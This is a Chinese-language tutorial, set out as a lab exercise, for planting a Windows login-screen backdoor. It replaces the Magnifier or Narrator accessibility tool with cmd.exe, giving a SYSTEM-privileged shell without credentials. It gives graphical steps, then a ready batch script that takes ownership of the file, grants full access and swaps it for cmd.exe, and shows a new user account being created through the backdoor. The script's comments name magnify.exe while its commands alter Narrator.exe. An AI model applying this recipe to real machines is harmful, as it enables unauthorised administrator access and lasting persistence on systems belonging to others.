利用开机账户登录“轻松访问”创建Windows后门
利用开机账户登录“轻松访问”创建Windows后门
实验原理:
利用登录账户界面的“轻松访问”中的“放大镜”,把它替换为cmd.exe程序,实现在不登录的情况下打开命令提示符,并进行一些操作(打开的cmd的权限为系统管理员权限)。
实验步骤:
一、图形化操作
1.找到Magnify.exe(放大镜),尝试重命名,提示没有权限,是因为该程序的所有者不是当前用户
2.把当前程序的所有者修改为当前用户
3.修改完程序的所有者之后,就可以对该程序进行操作了,这里先备份一下Magnify.exe,方便以后进行恢复,然后复制一份cmd.exe程序,并把复制的cmd程序修改为Magnify.exe,这样以后通过“轻松访问“,打开放大镜(实际上就是打开cmd.exe程序了)
4.点击“轻松访问“,打开”放大镜“点击左下角标识,我们可以看到如下界面呈现的页面,因为我们的后门是对放大镜程序做了更改,将放大镜直接更改为以管理员运行的cmd命令操作行,所以,我们点击放大镜,就可以直接进入cmd。
5.可以看到cmd.exe程序运行了,这样就可以进行一些操作了,这里以创建用户为例
二、用脚本运行:
1.脚本内容如下: #不懂命令的语法可以自己输入命令查看帮助文档
打开记事本,输入如下的命令:
切换目录到c:\windows\system32;
cd c:\windows\system32
更改文件名为magnify.exe的所有者为当前用户;
takeown /f Narrator.exe
将当前用户所在的组(管理员组)赋予完全访问权限;
icacls Narrator.exe /grant administrators:F
将可执行文件magnify.exe更名为magnify_back.exe;
ren Narrator.exe Narrator_back.exe
将cmd.exe复制并更名为magnify.exe;
copy cmd.exe Narrator.exe
2.懂命令的语法可以自己输入命令查看帮助文档
3.把文件保存为back.bat,并双击运行,接下开屏幕会闪烁一下,后门已经搞好了
4.重启电脑使刚才运行的脚本生效,点击“轻松访问“,点击”讲述人“
5.可以看到运行了cmd程序,因为我们的后门是对讲述人程序做了更改,将讲述人直接更改为以管理员运行的cmd命令操作行,所以,我们点击讲述人,就可以直接进入cmd。系统在没有输入用户名和密码的情况下,弹出了cmd命令行界面,而且是system权限
6.重启系统,用刚才创建的用户名密码登录(这里我加入域了,所以本地登录需要在用户名前面加上本地计算机名)